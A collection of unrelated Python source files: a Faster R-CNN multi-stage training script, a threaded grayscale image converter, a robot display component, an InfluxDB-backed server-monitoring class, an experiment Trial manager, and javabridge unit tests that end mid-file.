except KeyboardInterrupt:
pass
|
train.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Originally written by Rob Girshick. Adapted by Dennis Dam to
# use scenarios.
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import numpy as np
import sys, os
import multiprocessing as mp
from multiprocessing import Pool, TimeoutError
import cPickle
import shutil
from scenario import Scenario
import pprint
import GPUtil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
parser.add_argument('scenario_file',
help='Path scenario file (e.g. /home/user/scenario.p)')
parser.add_argument('--gpus', dest='gpus',
help='Number of GPU cores)',
default=1, type=int)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
# (e.g. "del net" in Python code) . To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, output_dir=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
# print 'first image: ',imdb.gt_roidb()
# print 'roidb len: {}'.format(len(roidb))
if output_dir==None:
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
print 'len roidb=',len(roidb)
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
queue.put({'model_path': rpn_model_path})
def rpn_generate_kw_wrapper(kwargs):
return rpn_generate(**kwargs)
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None, output_dir=None, part_id=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering
cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS
print 'RPN model: {}'.format(rpn_model_path)
print('Using config:')
pp = pprint.PrettyPrinter(depth=6)
pp.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
if output_dir==None:
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Generate proposals on the imdb
rpn_proposals = imdb_proposals(rpn_net, imdb)
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + ('_'+part_id if part_id != None else '')+'_proposals.pkl')
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
queue.put({'proposal_path': rpn_proposals_path, 'rpn_net': rpn_net_name})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None, output_dir=None):
"""Train a Fast R-CNN using proposals generated by an RPN.
"""
cfg.TRAIN.HAS_RPN = False # not generating prosals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 1
print 'Init model: {}'.format(init_model)
print 'RPN proposals: {}'.format(rpn_file)
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
if output_dir==None:
output_dir = get_output_dir(imdb)
print 'Output will be saved to `{:s}`'.format(output_dir)
# Train Fast R-CNN
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
fast_rcnn_model_path = model_paths[-1]
# Send Fast R-CNN model path over the multiprocessing queue
if queue != None:
queue.put({'model_path': fast_rcnn_model_path})
def dir_exists_or_create(path):
# create scenario dir if it not exists
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc: # Guard against race condition
pass
def join_pkls(proposal_paths, output_dir, rpn_net_name):
rpn_proposals=[]
for ppath in proposal_paths:
f= open(ppath, 'r')
rpn_proposals+=cPickle.load(f)
rpn_proposals_path=os.path.join(output_dir, rpn_net_name+'_proposals.pkl')
with open(rpn_proposals_path, 'wb') as f:
cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
return rpn_proposals_path
if __name__ == '__main__':
# first change current dir to py-faster-rcnn dir, or else scripts will break:
os.chdir(_init_paths.faster_rcnn_root)
print dir(mp)
args = parse_args()
print(args)
scenario=Scenario().load(args.scenario_file)
print "Using scenario:"
pprint.pprint(scenario.__dict__)
output_dir = os.path.join(scenario.scen_dir, 'output')
dir_exists_or_create(output_dir)
cfg.GPU_ID = scenario.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
# queue for communicated results between processes
mp_queue = mp.Queue()
# solves, iters, etc. for each training stagef
print '#'*25
print 'USING SCENARIO:'
print scenario.scenario
print '#'*25
max_iters = scenario.max_iters
cpu_count=mp.cpu_count()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
if scenario.config_path is not None:
cfg_from_file(scenario.config_path)
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=scenario.train_imdb,
init_model=scenario.weights_path,
solver=scenario.models['stage1_rpn_solver'],
max_iters=max_iters[0],
cfg=cfg, output_dir=output_dir)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
multi_gpu=False # disable for now
if multi_gpu:
parts = min(len(GPUtil.getGPUs()),cpu_count)
print 'Number of parts is',parts
pool=Pool(processes=parts)
def gpu_conf(cfg, gpu_id=None):
if gpu_id==None:
DEVICE_ID_LIST = GPUtil.getFirstAvailable()
if (len(DEVICE_ID_LIST) > 0):
cfg.GPU_ID = DEVICE_ID_LIST[0] # grab first element from list
else:
cfg.GPU_ID=gpu_id
return cfg
configs=[
dict(
imdb_name='%s_part_%dof%d' % (scenario.train_imdb, part_id, parts),
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=gpu_conf(cfg, part_id-1),
rpn_test_prototxt=scenario.models['rpn_test'],
output_dir=output_dir,
part_id=part_id
) for part_id in range(1,parts+1)
]
pprint.pprint(configs)
results=pool.map(rpn_generate_kw_wrapper, configs)
# rpn_net = ''
# for p in processes:
# p.start()
# passed_vars = mp_queue.get()
# rpn_net = passed_vars['rpn_net']
# proposal_paths.append(passed_vars['proposal_path'])
#
# for p in processes:
# p.join()
#
# aggregated_proposal_path = join_pkls(proposal_paths, output_dir, rpn_net)
else:
mp_kwargs = dict(
queue=mp_queue,
imdb_name=scenario.train_imdb,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=scenario.models['rpn_test'],
output_dir=output_dir
)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
# processes=[]
# proposal_paths=[]
# base_dict=
# for i in range(0, parts):
#
#
# part_id='%dof%d'%(i+1, parts)
# mp_kwargs = dict(
# queue=mp_queue,
# imdb_name= '%s_part_%s'%(scenario.train_imdb, part_id),
# rpn_model_path=str(rpn_stage1_out['model_path']),
# cfg=cfg,
# rpn_test_prototxt=scenario.models['rpn_test'],
# output_dir = output_dir,
# part_id=part_id
#
# )
#
# processes.append(mp.Process(target=rpn_generate, kwargs=mp_kwargs))
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=scenario.train_imdb,
init_model=scenario.weights_path,
solver=scenario.models['stage1_fast_rcnn_solver'],
max_iters=max_iters[1],
cfg=cfg,
rpn_file=rpn_stage1_out['proposal_path'], output_dir=output_dir)
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage1_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, init from stage 1 Fast R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=scenario.train_imdb,
init_model=str(fast_rcnn_stage1_out['model_path']),
solver=scenario.models['stage2_rpn_solver'],
max_iters=max_iters[2],
cfg=cfg, output_dir=output_dir)
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage2_out = mp_queue.get()
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 RPN, generate proposals'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=scenario.train_imdb,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=scenario.models['rpn_test'], output_dir=output_dir)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print 'Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model'
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=scenario.train_imdb,
init_model=str(rpn_stage2_out['model_path']),
solver=scenario.models['stage2_fast_rcnn_solver'],
max_iters=max_iters[3],
cfg=cfg,
rpn_file=rpn_stage2_out['proposal_path'], output_dir=output_dir)
p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
p.start()
fast_rcnn_stage2_out = mp_queue.get()
p.join()
# Create final model (just a copy of the last stage)
final_path = scenario.net_final_path
print 'cp {} -> {}'.format(
fast_rcnn_stage2_out['model_path'], final_path)
shutil.copy(fast_rcnn_stage2_out['model_path'], final_path)
print 'Final model: {}'.format(final_path)
|
commandlinesolution.py
|
import sys
import threading
from queue import Queue
import threading
import os
import time
import cv2
def task(filename,inp,out):
check = cv2.imread(f'./{inp}/{filename}')
gray = cv2.cvtColor(check,cv2.COLOR_BGR2GRAY)
cv2.imwrite(f'./{out}/{filename}',gray)
# Function to send task to threads
def do_stuff(q,inp,out):
while not q.empty():
value = q.get()
task(value,inp,out)
q.task_done()
arguments = sys.argv
if len(arguments) != 4 :
print("""Format :
py <script.name>.py inputdir outputdir no_of_threads
""")
else:
inputDir = arguments[1]
outpurDir = arguments[2]
threads = int(arguments[3])
# Loop For Number of Threads
t = threads
jobs = Queue()
os.mkdir('output')
for elem in os.listdir('input'):
jobs.put(elem)
start = time.time()
for i in range(t):
worker = threading.Thread(target=do_stuff, args=(jobs,inputDir,outpurDir))
worker.start()
jobs.join()
end = time.time()
print("Time Taken", end - start)
print("Finished.....")
|
display.py
|
from pepper.framework import AbstractComponent
from pepper.framework.component import FaceRecognitionComponent, ObjectDetectionComponent
from .server import DisplayServer
from threading import Thread, Lock
from PIL import Image
from io import BytesIO
import base64
import json
class DisplayComponent(AbstractComponent):
def __init__(self, backend):
super(DisplayComponent, self).__init__(backend)
server = DisplayServer()
server_thread = Thread(target=server.start)
server_thread.daemon = True
server_thread.start()
lock = Lock()
self._display_info = {}
def encode_image(image):
"""
Parameters
----------
image: Image.Image
Returns
-------
base64: str
Base64 encoded PNG string
"""
with BytesIO() as png:
image.save(png, 'png')
png.seek(0)
return base64.b64encode(png.read())
def on_image(image, orientation):
with lock:
if self._display_info:
server.update(json.dumps(self._display_info))
self._display_info = {
"hash": hash(str(image)),
"img": encode_image(Image.fromarray(image)),
"items": []
}
def add_items(items):
if self._display_info:
with lock:
self._display_info["items"] += [
{"name": item.name,
"confidence": item.confidence,
"bounds": item.bounds.to_list()
} for item in items]
face_recognition = self.require(DisplayComponent, FaceRecognitionComponent) # type: FaceRecognitionComponent
object_recognition = self.require(DisplayComponent, ObjectDetectionComponent) # type: ObjectDetectionComponent
self.backend.camera.callbacks += [on_image]
face_recognition.on_face_known_callbacks += [lambda faces: add_items(faces)]
object_recognition.on_object_callbacks += [lambda image, objects: add_items(objects)]
|
process.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: leeyoshinari
import time
import json
import threading
import influxdb
from logger import logger, cfg, handle_exception
from request import Request
class Process(object):
def __init__(self):
self.request = Request()
self._agents = {'ip': [], 'port': [], 'system': [], 'cpu': [], 'mem': [], 'time': [], 'disk': [], 'nic': [],
'network_speed': [], 'disk_size': [], 'mem_usage': [], 'cpu_usage': [], 'disk_usage': []}
# data expiration time
conn = influxdb.InfluxDBClient(cfg.getInflux('host'), cfg.getInflux('port'), cfg.getInflux('username'),
cfg.getInflux('password'), cfg.getInflux('database'))
conn.query(f'alter retention policy "autogen" on "{cfg.getInflux("database")}" duration '
f'{cfg.getInflux("expiryTime")}d REPLICATION 1 SHARD DURATION {cfg.getInflux("shardDuration")} default;')
logger.info(f'Data expiration time is {cfg.getInflux("expiryTime")} days')
t = threading.Thread(target=self.check_status, args=()) # Check the online status of the clients.
t.start()
@property
def agents(self):
return self._agents
@agents.setter
def agents(self, value):
logger.debug(f'The client registration data is {value}')
ip = value['host']
if ip in self._agents['ip']:
ind = self._agents['ip'].index(ip)
self._agents['cpu_usage'][ind] = value['cpu_usage']
self._agents['mem_usage'][ind] = value['mem_usage']
self._agents['disk_usage'][ind] = value['disk_usage']
self._agents['time'][ind] = time.time()
logger.info(f'{ip} server has been registered.')
else:
self._agents['ip'].append(value['host'])
self._agents['port'].append(value['port'])
self._agents['system'].append(value['system'])
self._agents['cpu'].append(value['cpu'])
self._agents['mem'].append(value['mem'])
self._agents['time'].append(time.time())
self._agents['disk'].append(value['disks'].split(','))
self._agents['nic'].append(value['nic'])
self._agents['disk_size'].append(value['disk_size'])
self._agents['network_speed'].append(value['network_speed'])
self._agents['cpu_usage'].append((value['cpu_usage']))
self._agents['mem_usage'].append((value['mem_usage']))
self._agents['disk_usage'].append((value['disk_usage']))
logger.info(f'{ip} server registered successfully!')
def check_status(self):
"""
Check the online status of the clients, and remove it when offline.
:return:
"""
while True:
time.sleep(5)
for i in range(len(self._agents['ip'])):
if time.time() - self._agents['time'][i] > 12:
ip = self._agents['ip'].pop(i)
self._agents['port'].pop(i)
self._agents['system'].pop(i)
self._agents['cpu'].pop(i)
self._agents['mem'].pop(i)
self._agents['time'].pop(i)
self._agents['disk'].pop(i)
self._agents['nic'].pop(i)
self._agents['network_speed'].pop(i)
self._agents['disk_size'].pop(i)
self._agents['cpu_usage'].pop(i)
self._agents['mem_usage'].pop(i)
self._agents['disk_usage'].pop(i)
logger.warning(f"The client server {ip} is in an abnormal state, and has been offline.")
break
@handle_exception(is_return=True, default_value=[-1, -1, -1, -1, '-', -1])
def get_gc(self, ip, port, interface):
"""
Get GC data of port
:param ip: clent IP
:param port: client monitoring port
:param interface: interface
:return:
"""
res = self.request.request('get', ip, port, interface)
if res.status_code == 200:
response = json.loads(res.content.decode())
logger.debug(f'The GC data of the port {port} of the server {ip} is {response}')
if response['code'] == 0:
return response['data']
else:
logger.error(response['msg'])
return [-1, -1, -1, -1, '-', -1]
else:
logger.error(f'The response status code of getting GC data of the '
f'port {port} of the server {ip} is {res.status_code}.')
return [-1, -1, -1, -1, '-', -1]
@handle_exception(is_return=True, default_value={'host': [], 'port': [], 'pid': [], 'isRun': [], 'startTime': []})
def get_monitor(self, host=None):
"""
Get the list of monitoring ports.
:return:
"""
monitor_list = {'host': [], 'port': [], 'pid': [], 'isRun': [], 'startTime': []}
if host:
post_data = {
'host': host,
}
port = self._agents['port'][self._agents['ip'].index(host)]
res = self.request.request('post', host, port, 'getMonitor', json=post_data)
if res.status_code == 200:
response = json.loads(res.content.decode())
logger.debug(f'The return value of server {host} of getting monitoring list is {response}.')
if response['code'] == 0:
monitor_list['host'] += response['data']['host']
monitor_list['port'] += response['data']['port']
monitor_list['pid'] += response['data']['pid']
monitor_list['isRun'] += response['data']['isRun']
monitor_list['startTime'] += response['data']['startTime']
else:
for ip, port in zip(self._agents['ip'], self._agents['port']): # Traverse all clients IP addresses
post_data = {
'host': ip,
}
try:
res = self.request.request('post', ip, port, 'getMonitor', json=post_data)
if res.status_code == 200:
response = json.loads(res.content.decode())
logger.debug(f'The return value of server {ip} of getting monitoring list is {response}')
if response['code'] == 0:
monitor_list['host'] += response['data']['host']
monitor_list['port'] += response['data']['port']
monitor_list['pid'] += response['data']['pid']
monitor_list['isRun'] += response['data']['isRun']
monitor_list['startTime'] += response['data']['startTime']
except Exception as err:
logger.error(err)
continue
return monitor_list
|
builtin.py
|
import bisect
import copy
import datetime
import functools
from queue import Empty as EmptyQueueException
from multiprocessing import Queue, Process
from typing import Optional, Callable, Dict, Tuple
def callback(queue, **kwargs):
kwargs['callback_timestamp'] = str(datetime.datetime.utcnow())
queue.put(kwargs)
class Trial:
""" A trial represent an experience in progress, it holds all the necessary information to stop it if it is
in progress or resume it if it was suspended """
def __init__(self, id: str, task: Callable[[Dict[str, any]], None], params: Dict[str, any], queue: Queue):
self.id = id
self.task = task
self.params = copy.deepcopy(params)
self.kwargs = params
self.queue: Queue = queue
self.kwargs['callback'] = functools.partial(callback, queue=queue)
self.process: Optional[Process] = None
self.latest_results = None
self._timestamps = []
self.results = []
self.insert_timestamp('creation')
@property
def timestamps(self):
return self._timestamps
def is_alive(self) -> bool:
return self.process and self.process.is_alive()
def has_finished(self) -> bool:
return self.latest_results and self.latest_results[-1].get('finished')
def is_suspended(self) -> bool:
return self.process is None and not self.has_finished()
def start(self) -> None:
""" start or resume a process if it is not already running"""
if not self.is_alive():
self.process = Process(target=self.task, kwargs=self.kwargs)
self.process.start()
self.insert_timestamp('start')
def stop(self, safe=False) -> None:
""" stop the trial in progress if safe is true it will wait until the process exit """
if self.process:
self.process.terminate()
self.insert_timestamp('stop')
if safe:
self.process.join()
self.process = None
def get_last_results(self) -> Tuple[Dict[str, any], ...]:
""" return the last non null result that was received """
return self.latest_results
def receive(self) -> Optional[Tuple[Dict[str, any], ...]]:
""" check if results are ready, if not return None.
This function can return multiple results if it has not been called in a long time """
obs = []
while True:
try:
obs.append(self.queue.get(True, timeout=0.01))
except EmptyQueueException:
if len(obs) == 0:
return None
self.latest_results = tuple(obs)
return tuple(obs)
def insert_timestamp(self, name, time=None):
if time is None:
time = str(datetime.datetime.utcnow())
idx = bisect.bisect_left([t[1] for t in self._timestamps], time)
self._timestamps.insert(idx, (name, time))
def to_dict(self):
return {
'results': self.results,
'timestamps': self.timestamps,
'params': self.params,
'id': self.id
}
def build(id: str, task: Callable[[Dict[str, any]], None], params: Dict[str, any], queue: Queue,
**kwargs):
return Trial(id, task, params, queue)
|
test_jutil.py
|
'''test_jutil.py - test the high-level interface
python-javabridge is licensed under the BSD license. See the
accompanying file LICENSE for details.
Copyright (c) 2003-2009 Massachusetts Institute of Technology
Copyright (c) 2009-2013 Broad Institute
All rights reserved.
'''
import gc
import os
import numpy as np
import threading
import unittest
import sys
import javabridge
# Monkey patch some half-corrent implementations of methods that only
# appeared in Python 2.7.
if not hasattr(unittest.TestCase, 'assertIn'):
unittest.TestCase.assertIn = lambda self, a, b: self.assertTrue(a in b)
if not hasattr(unittest.TestCase, 'assertNotIn'):
unittest.TestCase.assertNotIn = lambda self, a, b: self.assertTrue(a not in b)
if not hasattr(unittest.TestCase, 'assertSequenceEqual'):
unittest.TestCase.assertSequenceEqual = lambda self, a, b: self.assertTrue([aa == bb for aa, bb in zip(a, b)])
class TestJutil(unittest.TestCase):
def setUp(self):
self.env = javabridge.attach()
def tearDown(self):
javabridge.detach()
def test_01_01_to_string(self):
jstring = self.env.new_string_utf("Hello, world")
self.assertEqual(javabridge.to_string(jstring), "Hello, world")
def test_01_02_make_instance(self):
jobject = javabridge.make_instance("java/lang/Object", "()V")
self.assertTrue(javabridge.to_string(jobject).startswith("java.lang.Object"))
def test_01_03_call(self):
jstring = self.env.new_string_utf("Hello, world")
self.assertEqual(javabridge.call(jstring, "charAt", "(I)C", 0), "H")
def test_01_03_01_static_call(self):
result = javabridge.static_call("Ljava/lang/String;", "valueOf",
"(I)Ljava/lang/String;",123)
self.assertEqual(result, "123")
def test_01_04_make_method(self):
env = self.env
class String(object):
def __init__(self):
self.o = env.new_string_utf("Hello, world")
charAt = javabridge.make_method("charAt", "(I)C", "My documentation")
s = String()
self.assertEqual(s.charAt.__doc__, "My documentation")
self.assertEqual(s.charAt(0), "H")
def test_01_05_00_get_static_field(self):
klass = self.env.find_class("java/lang/Short")
self.assertEqual(javabridge.get_static_field(klass, "MAX_VALUE", "S"), 2**15 - 1)
def test_01_05_01_no_field_for_get_static_field(self):
def fn():
javabridge.get_static_field(
'java/lang/Object', "NoSuchField", "I")
self.assertRaises(javabridge.JavaException, fn)
def test_01_05_02_no_class_for_get_static_field(self):
def fn():
javabridge.get_static_field(
'no/such/class', "field", "I")
self.assertRaises(javabridge.JavaException, fn)
def test_01_05_03_set_static_field(self):
class_name = "org/cellprofiler/javabridge/test/RealRect"
test_cases = (
("fs_char", "C", "A"),
("fs_byte", "B", 3),
("fs_short", "S", 15),
("fs_int", "I", 392),
("fs_long", "J", -14),
("fs_float", "F", 1.03),
("fs_double", "D", -889.1),
("fs_object", "Ljava/lang/Object;",
javabridge.make_instance("java/lang/Integer", "(I)V", 15)),
("fs_object", "Ljava/lang/Object;", None))
for field_name, signature, value in test_cases:
javabridge.set_static_field(class_name, field_name, signature, value)
v = javabridge.get_static_field(class_name, field_name, signature)
if isinstance(value, float):
self.assertAlmostEqual(v, value)
elif isinstance(value, javabridge.JB_Object):
self.assertTrue(javabridge.call(
value, "equals", "(Ljava/lang/Object;)Z", v))
else:
self.assertEqual(v, value)
def test_01_05_04_no_field_for_set_static_field(self):
def fn():
javabridge.set_static_field(
'java/lang/Object', "NoSuchField", "I", 5)
self.assertRaises(javabridge.JavaException, fn)
def test_01_05_05_no_class_for_set_static_field(self):
def fn():
javabridge.set_static_field(
'no/such/class', "field", "I", 5)
self.assertRaises(javabridge.JavaException, fn)
def test_01_06_get_enumeration_wrapper(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
keys = javabridge.call(properties, "keys", "()Ljava/util/Enumeration;")
enum = javabridge.get_enumeration_wrapper(keys)
has_java_vm_name = False
while(enum.hasMoreElements()):
key = javabridge.to_string(enum.nextElement())
if key == "java.vm.name":
has_java_vm_name = True
self.assertTrue(has_java_vm_name)
def test_01_07_get_dictionary_wrapper(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
d = javabridge.get_dictionary_wrapper(properties)
self.assertTrue(d.size() > 10)
self.assertFalse(d.isEmpty())
keys = javabridge.get_enumeration_wrapper(d.keys())
values = javabridge.get_enumeration_wrapper(d.elements())
n_elems = d.size()
for i in range(n_elems):
self.assertTrue(keys.hasMoreElements())
key = javabridge.to_string(keys.nextElement())
self.assertTrue(values.hasMoreElements())
value = javabridge.to_string(values.nextElement())
self.assertEqual(javabridge.to_string(d.get(key)), value)
self.assertFalse(keys.hasMoreElements())
self.assertFalse(values.hasMoreElements())
def test_01_08_jenumeration_to_string_list(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
d = javabridge.get_dictionary_wrapper(properties)
keys = javabridge.jenumeration_to_string_list(d.keys())
enum = javabridge.get_enumeration_wrapper(d.keys())
for i in range(d.size()):
key = javabridge.to_string(enum.nextElement())
self.assertEqual(key, keys[i])
def test_01_09_jdictionary_to_string_dictionary(self):
properties = javabridge.static_call("java/lang/System", "getProperties",
"()Ljava/util/Properties;")
d = javabridge.get_dictionary_wrapper(properties)
pyd = javabridge.jdictionary_to_string_dictionary(properties)
keys = javabridge.jenumeration_to_string_list(d.keys())
for key in keys:
value = javabridge.to_string(d.get(key))
self.assertEqual(pyd[key], value)
def test_01_10_make_new(self):
env = self.env
class MyClass:
new_fn = javabridge.make_new("java/lang/Object", '()V')
def __init__(self):
self.new_fn()
my_instance = MyClass()
def test_01_11_class_for_name(self):
c = javabridge.class_for_name('java.lang.String')
name = javabridge.call(c, 'getCanonicalName', '()Ljava/lang/String;')
self.assertEqual(name, 'java.lang.String')
def test_02_01_access_object_across_environments(self):
#
# Create an object in one environment, close the environment,
# open a second environment, then use it and delete it.
#
env = self.env
self.assertTrue(isinstance(env,javabridge.JB_Env))
class MyInteger:
new_fn = javabridge.make_new("java/lang/Integer",'(I)V')
def __init__(self, value):
self.new_fn(value)
intValue = javabridge.make_method("intValue", '()I')
my_value = 543
my_integer=MyInteger(my_value)
def run(my_integer = my_integer):
env = javabridge.attach()
self.assertEqual(my_integer.intValue(),my_value)
javabridge.detach()
t = threading.Thread(target = run)
t.start()
t.join()
def test_02_02_delete_in_environment(self):
env = self.env
self.assertTrue(isinstance(env, javabridge.JB_Env))
class MyInteger:
new_fn = javabridge.make_new("java/lang/Integer",'(I)V')
def __init__(self, value):
self.new_fn(value)
intValue = javabridge.make_method("intValue", '()I')
my_value = 543
my_integer=MyInteger(my_value)
def run(my_integer = my_integer):
env = javabridge.attach()
self.assertEqual(my_integer.intValue(),my_value)
del my_integer
javabridge.detach()
t = threading.Thread(target = run)
t.start()
t.join()
def test_02_03_death_and_resurrection(self):
'''Put an object into another in Java, delete it in Python and recover it'''
np.random.seed(24)
my_value = np.random.randint(0, 1000)
jobj = javabridge.make_instance("java/lang/Integer", "(I)V", my_value)
integer_klass = self.env.find_class("java/lang/Integer")
jcontainer = self.env.make_object_array(1, integer_klass)
self.env.set_object_array_element(jcontainer, 0, jobj)
del jobj
gc.collect()
jobjs = self.env.get_object_array_elements(jcontainer)
jobj = jobjs[0]
self.assertEqual(javabridge.call(jobj, "intValue", "()I"), my_value)
def test_02_04_non_java_thread_deletes_it(self):
'''Delete a Java object on a not-Java thread'''
refs = [javabridge.make_instance("java/lang/Integer", "(I)V", 5)]
def run():
del refs[0]
gc.collect()
t = threading.Thread(target = run)
t.start()
t.join()
def test_03_01_cw_from_class(self):
'''Get a class wrapper from a class'''
c = javabridge.get_class_wrapper(javabridge.make_instance('java/lang/Integer', '(I)V',
14))
def test_03_02_cw_from_string(self):
'''Get a class wrapper from a string'''
